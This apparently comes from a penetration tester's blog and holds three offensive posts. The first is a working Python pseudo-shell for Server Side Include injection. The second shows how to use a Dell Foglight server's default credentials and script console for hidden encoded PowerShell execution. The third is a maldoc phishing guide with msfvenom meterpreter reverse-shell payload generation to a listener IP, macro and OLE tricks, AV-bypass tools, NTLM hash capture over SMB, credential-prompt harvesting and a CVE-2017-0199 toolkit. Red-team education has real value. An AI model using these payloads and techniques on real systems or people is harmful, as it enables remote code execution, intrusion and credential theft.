Category: Exploit

Exploiting Server Side Include Injection


Recently I was performing a penetration test and came across a Server Side Include injection bug (SSI).  If you are familiar with cross-site scripting (XSS) this type of vulnerability will sound familiar.  This is caused by an application taking input form the user, and supplying it in the response from the server.  The mitigations are the same for XSS, sanitize/encode data before returning it. Consider using white-listed values.

Where this is different than XSS is that in the case of SSI injection, the use supplied data doesn’t just end up in the HTML returned to the user, it ends up being evaluated by the server itself.  Here is some code that is similar to what I had found:

First the $name parameter was populated by a POST variable supplied by the user:

$name = $_POST['name'];

And below in the code the value that the user provided is reflected back within the application response.

<input name="name" value="<?php if (isset($name)) { echo $name; } ?>

Likely the developer did this because they wanted to refill the form for the user if they made a mistake and needed to resubmit the form.

The Apache documentation on SSI shows how to use a server side include. Note the portion under executing commands:

“You can actually have SSI execute a command using the shell (/bin/sh, to be precise – or the DOS shell, if you’re on Win32).”

The syntax is simple:

<!--#exec cmd="COMMAND" -->

If we were to supply something similar within the name parameter, our server side include would be executed and then be returned in the response.

In the default configuration,  web servers won’t have SSI enabled, or won’t allow for the exec command.  Some applications will have a legitimate need to use SSI, and developers/admins will enable this functionality.

Here is some PoC code to exploit this issue:

import requests
while True:
    cmd = raw_input('shell> ')
    payload = "MAGIC<!--#exec cmd='%s' -->MAGIC" % (cmd)
    r = requests.post("URL", data = {"name": payload})
    delimiter = 'MAGIC'
    output = r.text.split(delimiter, 2)[1]
    print output
  1. Import the requests library to interact via HTTP
  2. Start an infinite loop
  3. Take in a string to be executed as a command
  4. Craft the payload.  This is an include tag that will exec the supplied string from line 3
  5. Send the payload in an HTTP POST within the “name” parameter
  6. Define the delimiter.  This will be used to identify the command output within the response
  7. Split the response and set the “output” variable to only contain the command output
  8. Print the output to the screen

This creates a type of “pseudo-shell” that we can use to interact with the web server.  We won’t be able to do anything interactive or change directories, but we can send any OS command to the server and receive the output.


Exploiting an unsecured Dell Foglight server

 

Dell Foglight for Virtualization is an infrastructure performance monitoring tool that can also be used to manage systems as well.  It comes configured with a default username and password of “foglight”.

It is possible to execute code on the host itself through an integrated scripting console.

By browsing to Homes -> Administration

And then browsing to Investigate -> Data -> Script Console

Under the “Scripts” tab, click the [+] Add button.

From here you can enter any groovy code and execute it on the host.  A simple way to execute commands is by using:

"cmd.exe /c ".execute

or

"powershell.exe -NoP -NonI -W Hidden -Enc".execute

This is a good place to swap in your Powershell Empire or Metasploit Web Delivery stage 0 payload.

Foglight also has the ability to execute code on the devices which it manages.

By browsing to Homes -> Automation

And then browsing to the Workflow Management tab and clicking the [+] New button.

When within the Workflow Studio click All ActionPacks -> Common -> Scripting

Here you will see a few choices:

  • Run PowerShell Script
  • Send and Run Command(s)
  • Send and Run PowerShell script

I was not able to create a functional workflow, however with this it is likely possible to push a malicious workflow to all managed devices.

One other notable feature of Foglight is that it stores credentials.

By browsing to Dashboards-> Administration -> Credentials

and then click Manage Credentials.

According to the Foglight UI, “A lockbox contains a collection of encrypted credentials and the keys for their encryption and decryption.” While there does not seem to be a way to extract the credential plaintext thorough the UI, it is likely possible to compromise and decrypt these stored credentials once the host is compromised.


Phishing with Maldocs

 

There are many ways to run a phishing campaign.  The most common of them all is a typical credential harvesting attack, where the attacker sends an email to the target enticing them to click a link to a spoofed website.  Running these campaigns are fairly straight forward, and a couple of tools make this very easy to do.  The most common of all is likely the Social Engineer Toolkit.  SET works great for cloning an existing website and setting up a PHP form to collect credentials.  While this technique is very effective, it may also be a good choice to perform phishing attacks with malicious documents.

Macro Attacks

The most common Maldoc is a malicious Microsoft Word document.  Typically these will contain embedded Macros which execute a payload when opened.  Because of this, modern Windows will usually display two prompts that the user must click through before the payload is executed.  Typically they must click “Enable Content” and the subsequently click “Enable Macros”.

There a quite a few ways you can generate these.  The most simple way is with Metasploit.  As documented here, all you need to do is use msfvenom to generate some malicious visual basic code like so:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

And then paste it into the Visual Basic Editor.

Set up a listener in the Metasploit framework and wait for the user to enable macros.

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.101; set LPORT 8080; run; exit -y"

While you can use multiple encoding types, this attack is likely to get caught by Anti-Virus.

You can use other tools besides msfvenom to generate the VBA code required for the Macro.  You can also use Unicorn by TrustedSec. To generate the payload use:

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

And you can catch the meterpreter shell with the same listener you would use with the msfvenom payload.

OLE Attack

If you like Powershell Empire more than Metasploit, Empire also has a stager for office macros. Enigma0x3 has a good blog post on how to do this.  Also notable is the OLE attack.  Instead of using a macro to execute a payload, you can embed a file within the document itself.  By changing the icon, you may be able to trick the user into executing a bat file which contains a malicious payload.  This attack is also documented in the same blog post.  This attack will prompt the user before executing payload as seen below:

AV Bypass

Because of the success of the Macro attack method, AV vendors have been quick to adapt.  If AV is causing an issue, there are a few more tools that you can use to avoid detection.  LuckyStrike is a tool that was released at DerbyCon 2016.  The author has a lengthy blog post on this tool that is well worth the read.  LuckyStrike contains a bunch of obfuscation methods to avoid detection and can even go as far as encrypting the payload ensuring that AV sandbox will never be able to execute it for dynamic analysis.

If Software Restriction Policies or EMET are what is keeping you down, wePWNise might be the tool for you.  As MRWLabs explains it on thier website, “It collects information through enumeration of relevant parts of the Registry where various policy security settings are stored, and identifies suitable binaries which are safe to inject code into.”

Capturing Hashes

Now to get into the more exotic methods.  A very novel way of capturing NTLM hashes is with a tool named WordSteal. The way WordSteal works is by embedding a reference to a file hosted on a malicious SMB server.  When the document is opened, the client will try to connect to the SMB server without any user interaction.  This will capture an NTLM handshake and can be sent to a password cracker just as you would do if you were running Responder within the local network.  The biggest caveat here is that the client network must be able to initiate SMB connections outbound.  This means that they must not be any egress rule blocking port 445.  This is not always the case, but if it goes through this is a good way to collect hashes as the user does not have to do anything other than open the document.  If you are able to crack domain credentials, there is a good chance you can use Microsoft Outlook to execute a payload within the target environment as described in my blog post here: From OSINT to Internal – Gaining Access from outside the perimeter

This attack requires a malicious SMB server.  Fortunately, we can stand this up quite easily by using Metasploit.  Just run the following module:

use auxiliary/server/capture/smb

And it will output any handshakes that it captures.

Metasploit has the option of outputting this data in a format you can send to Cain and Abel or John the Ripper.

Prompting for credentials

Phishery is another great tool for non-traditional credential harvesting. Phishery is written in Go, and pre-compiled binaries are available here.  The way Phishery works is by using HTTP Basic Authentication delivered over SSL.  This tool is very easy to use, although to bypass the warnings to the end user you will need to set up a domain with a proper SSL certificate, or they will see this:

After clicking “Yes” or bypassing it all together with a valid certificate, the user will receive an authentication prompt.

If they enter their credentials, you will see them posted back to the listening server.

Exploits

While all these require some level of social engineering, you can also exploit the target with an exploit.  Recently CVE-2017-0199 was disclosed by FireEye after it had been found in the wild. This exploit targets RTF files opened with Microsoft Word. MDSec had published a blog post on how to exploit it, and a blogger wrote a step-by-step set of instructions to create a working exploit.

If you don’t want to do this manually, there is also a toolkit published on GitHub for exploiting this. It can create the RTF file, host the HTA payload, and host an exe that is executed by the HTA file.  The only other things you need to make it work are msfvenom and Metasploit, although with some minor modifications it could be used to deliver any other payload as well, such as a Powershell Empire stager.

At the time of this writing, there is a Metasploit module in development for this attack.  A pull request has been opened, and will likely be merged into the main branch soon.